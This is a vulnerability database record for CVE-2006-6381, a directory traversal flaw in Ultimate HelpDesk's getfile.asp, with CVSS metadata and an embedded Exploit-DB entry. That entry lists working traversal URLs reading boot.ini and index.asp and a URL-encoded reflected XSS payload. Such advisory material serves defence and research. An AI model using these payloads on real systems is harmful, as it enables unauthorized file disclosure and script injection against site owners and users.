ID OSVDB:31730
Type osvdb
Reporter OSVDB
Modified 2006-12-01T11:03:46
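Description
Directory traversal in getfile.asp of Ultimate HelpDesk: a ".." (dot dot) sequence in the filename parameter lets a remote attacker read arbitrary files (CVE-2006-6381). In web server logs, the indicator is a request to getfile.asp whose filename value contains "../".
Manual Testing Notes
/getfile.asp?filename=../../../boot.ini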
References:
Secunia Advisory ID:23225
Related OSVDB ID: 31729
ISS X-Force ID: 30722
Generic Exploit URL: http://milw0rm.com/exploits/2881
FrSIRT Advisory: ADV-2006-4819
CVE-2006-6381
{"href": "https://vulners.com/osvdb/OSVDB:31730", "id": "OSVDB:31730", "reporter": "OSVDB", "published": "2006-12-01T11:03:46", "description": "## Manual Testing Notes\n/getfile.asp?filename=../../../boot.ini\n## References:\n[Secunia Advisory ID:23225](https://secuniaresearch.flexerasoftware.com/advisories/23225/)\n[Related OSVDB ID: 31729](https://vulners.com/osvdb/OSVDB:31729)\nISS X-Force ID: 30722\nGeneric Exploit URL: http://milw0rm.com/exploits/2881\nFrSIRT Advisory: ADV-2006-4819\n[CVE-2006-6381](https://vulners.com/cve/CVE-2006-6381)\n", "title": "Ultimate HelpDesk getfile.asp filename Variable Traversal Arbitrary File Access", "lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "references": [], "edition": 1, "cvelist": ["CVE-2006-6381"], "affectedSoftware": [], "viewCount": 7, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2017-04-28T13:20:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6381"]}, {"type": "exploitdb", "idList": ["EDB-ID:2881"]}], "modified": "2017-04-28T13:20:28", "rev": 2}, "vulnersScore": 6.5}, "modified": "2006-12-01T11:03:46"}
{"cve": [{"lastseen": "2021-02-02T05:27:26", "description": "Directory traversal vulnerability in getfile.asp in Ultimate HelpDesk allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter.", "edition": 4, "cvss3": {}, "published": "2006-12-07T21:28:00", "title": "CVE-2006-6381", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-6381"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:ultimate_helpdesk:ultimate_helpdesk:*"], "id": "CVE-2006-6381", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6381", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ultimate_helpdesk:ultimate_helpdesk:*:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T17:14:20", "description": "Ultimate HelpDesk (XSS/Local File Disclosure) Vulnerabilities. CVE-2006-6380,CVE-2006-6381. 
Webapps exploit for asp platform", "published": "2006-12-01T00:00:00", "type": "exploitdb", "title": "Ultimate HelpDesk XSS/Local File Disclosure Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6381", "CVE-2006-6380"], "modified": "2006-12-01T00:00:00", "id": "EDB-ID:2881", "href": "https://www.exploit-db.com/exploits/2881/", "sourceData": "*******************************************************************************\n# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities\n# Author : ajann\n# Contact : :(\n\n*******************************************************************************\n\nLogin Before Vulnerabilities.:\n\n\n[[SOURCE]]]------------------------------------------------------\n\nhttp://[target]/[path]//getfile.asp?filename=[SQL]\n\nExample:\n\n//getfile.asp?filename=../index.asp\n//getfile.asp?filename=../../../boot.ini\n\n[[/SOURCE]]]\n\n\n[[XSS]]]---------------------------------------------------------\n\nhttp://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]\n\nExample:\n\n//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E\n\n[[/XSS]]]\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# ajann,Turkey\n# ...\n\n# Im not Hacker!\n\n# milw0rm.com [2006-12-01]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2881/"}]}